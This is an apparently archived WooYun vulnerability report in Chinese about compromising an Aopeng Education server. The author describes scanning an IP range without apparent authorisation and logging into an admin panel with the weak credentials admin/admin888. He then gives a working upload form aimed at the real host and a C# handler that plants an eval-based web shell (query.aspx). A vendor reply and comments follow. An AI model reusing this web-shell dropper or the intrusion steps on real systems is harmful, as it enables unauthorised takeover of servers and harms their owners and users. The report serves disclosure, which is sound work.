当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102658

漏洞标题:奥鹏教育某重要站点getshell

相关厂商:open.com.cn

漏洞作者: BloodSword

提交时间:2015-03-20 19:52

修复时间:2015-05-07 16:12

公开时间:2015-05-07 16:12

漏洞类型:后台弱口令

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-20: 细节已通知厂商并且等待厂商处理中
2015-03-23: 厂商已经确认,细节仅向厂商公开
2015-04-02: 细节向核心白帽子及相关领域专家公开
2015-04-12: 细节向普通白帽子公开
2015-04-22: 细节向实习白帽子公开
2015-05-07: 细节向公众公开

简要描述:

准备参加这个学校的培训,看着看着就忍不住检测了网站。。

详细说明:

简单对C断扫描,发现这个IP,http://116.213.120.35/,弱口令admin admin888 进去了。。
看了一下后台,一时没有发现拿shell的地方,然后到处点发现这里。

1.jpg

感觉有戏了!

漏洞证明:

利用代码:

<form name="form" method="post" action="http://116.213.120.35/tools/upload_ajax.ashx" enctype="multipart/form-data" >
<input type="file" name="Filedata">
<input type="submit" name="Submit" value="上传" ></form>


ashx文件为:

<%@ WebHandler Language="C#" Class="Handler" %> 
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
string show="<% @Page Language=\"Jscript\"%"+"><%eval(Request.Item"+"[\"keio\"]"+",\"unsafe\");%>Hey web master,Have a nice day o.O? I hope so! HaHa";
StreamWriter file1= File.CreateText(context.Server.MapPath("query.aspx"));
file1.Write(show);
file1.Flush();
file1.Close();

}

public bool IsReusable {
get {
return false;
}
}

}


同目录生成了个aspx文件。http://116.213.120.35https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/201503/20/query.aspx

2.jpg

修复方案:

修改弱口令啊,还需要检查一下别人的马儿。。

版权声明:转载请注明来源 BloodSword@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-03-23 16:11

厂商回复:

此平台为测试站点,为测试方便,密码为按要求进行复杂性测试,3-30前完成修改

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-23 17:02 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:182 | 没有最专业的农民,只有更努力地耕耘..........)

    奥鹏的又活了,之前忽略那么多。

  2. 2015-03-23 22:53 | BloodSword ( 路人 | Rank:23 漏洞数:3 )

    @专业种田 核心白帽有靠谱的厂商可以推荐吗?我想攒点rank以后好找工作

  3. 2015-03-23 23:13 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1425 漏洞数:182 | 没有最专业的农民,只有更努力地耕耘..........)

    @BloodSword 你看最新确认的给的分高的!